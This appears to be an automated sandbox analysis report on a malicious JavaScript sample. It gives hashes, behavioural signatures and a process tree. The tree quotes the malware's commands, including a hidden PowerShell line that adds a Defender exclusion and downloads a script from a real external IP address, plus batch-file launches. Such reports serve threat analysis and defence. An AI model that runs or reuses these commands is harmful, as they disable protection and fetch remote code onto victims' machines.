Analysis

max time kernel: 31s
max time network: 33s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 27/05/2023, 06:47
Static task: static1

Behavioral task: behavioral1
  Sample: c80a26b806b3486c6157d8904c2e13e7.js
  Resource: win7-20230220-en

Behavioral task: behavioral2
  Sample: c80a26b806b3486c6157d8904c2e13e7.js
  Resource: win10v2004-20230220-en
General

Target: c80a26b806b3486c6157d8904c2e13e7.js
Size: 1KB
MD5: c80a26b806b3486c6157d8904c2e13e7
SHA1: 54d8be3eb5bdd4a788dcef3265cab6c314be1ccc
SHA256: 64339638d9234ab1efe25fe180b3097a6614687c8f83b1cc0c5a1dde570aaf81
SHA512: 4b7c084016a3fb20ae5b95c51c0459c327b163f0d7d942d931182009cd4bde50f24a867d7e60b62a6801189bcb4bba425b474e85b009ccb27e88bc3af6f59200
Malware Config
Signatures

Process spawned unexpected child process (2 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
  description | pid | pid_target | Process | procid_target
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1592 | 1968 | cmd.exe | 30
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 676 | 1968 | cmd.exe | 30

Blocklisted process makes network request (1 IoC)
  flow | pid | Process
  3 | 828 | wscript.exe

Drops file in System32 directory (1 IoC)
  description | ioc | Process
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Opens file in notepad (likely ransom note) (1 IoC)
  pid | Process
  788 | NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid | Process
  892 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description | pid | Process
  Token: SeDebugPrivilege | 892 | powershell.exe

Suspicious use of WriteProcessMemory (9 IoCs)
  description | pid | Process | procid_target
  PID 1592 wrote to memory of 1812 | 1592 | cmd.exe | 35
  PID 1592 wrote to memory of 1812 | 1592 | cmd.exe | 35
  PID 1592 wrote to memory of 1812 | 1592 | cmd.exe | 35
  PID 1812 wrote to memory of 892 | 1812 | cmd.exe | 37
  PID 1812 wrote to memory of 892 | 1812 | cmd.exe | 37
  PID 1812 wrote to memory of 892 | 1812 | cmd.exe | 37
  PID 676 wrote to memory of 788 | 676 | cmd.exe | 38
  PID 676 wrote to memory of 788 | 676 | cmd.exe | 38
  PID 676 wrote to memory of 788 | 676 | cmd.exe | 38
Processes

- C:\Windows\system32\wscript.exe
  Command: wscript.exe C:\Users\Admin\AppData\Local\Temp\c80a26b806b3486c6157d8904c2e13e7.js
  PID: 828
  Signatures: Blocklisted process makes network request

- C:\Windows\system32\cmd.exe
  Command: cmd /c start /MIN C:\ProgramData\BLD.bat
  PID: 1592
  Signatures: Process spawned unexpected child process; Suspicious use of WriteProcessMemory

  - C:\Windows\system32\cmd.exe
    Command: C:\Windows\system32\cmd.exe /K C:\ProgramData\BLD.bat
    PID: 1812
    Signatures: Suspicious use of WriteProcessMemory

    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command: PowerShell.exe -WindowStyle hidden "Add-MpPreference -ExclusionExtension "Start-Sleep -Seconds 3;"Invoke-WebRequest 'http://188.227.59.169/zayavka/1.yay' -OutFile 'C:\ProgramData\archive.ps1'";
      PID: 892
      Signatures: Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

- C:\Windows\system32\cmd.exe
  Command: cmd /c start C:\ProgramData\zayavka2.txt
  PID: 676
  Signatures: Process spawned unexpected child process; Suspicious use of WriteProcessMemory

  - C:\Windows\system32\NOTEPAD.EXE
    Command: "C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\zayavka2.txt
    PID: 788
    Signatures: Opens file in notepad (likely ransom note)
Network
MITRE ATT&CK Enterprise v6
Downloads

- Filesize: 322B
  MD5: 018d63793042f588a85968475d98decf
  SHA1: 2c4f9a0bd490c2b53976adf08805dcc92fac349a
  SHA256: afa8d3929a2809a91ffaa775fcc953b293e52b8accce3cd24c843cb0abbd13d0
  SHA512: ee91d2218f6ac4d763858c8be3cc7ee23660de14e8dd6aea2a4a40b45a5aa6c3337ac13a366db52aab796f04058e2ec92ec81dec6c3cb93d4c310f59a6f9f98a

- Filesize: 1KB
  MD5: 6cea5f86700d707b53b8f4a67d1ccf29
  SHA1: 37e53dd35cbf58bd9c3b7ba0bbd7be81fcb9fe54
  SHA256: 6e9ba5a17bb1ee71c64337b4cd794336eaed26e79d5e2eba6c31018bc9103c70
  SHA512: d836c1624995dd93462fa462ec83c5c150189c0e7b2c0c9eeb923c7b7aec40aa91e27f10ac7b5a4dc8e78c2dc8df121c97022e9b8fbdaf0d5c93f59a0e535c29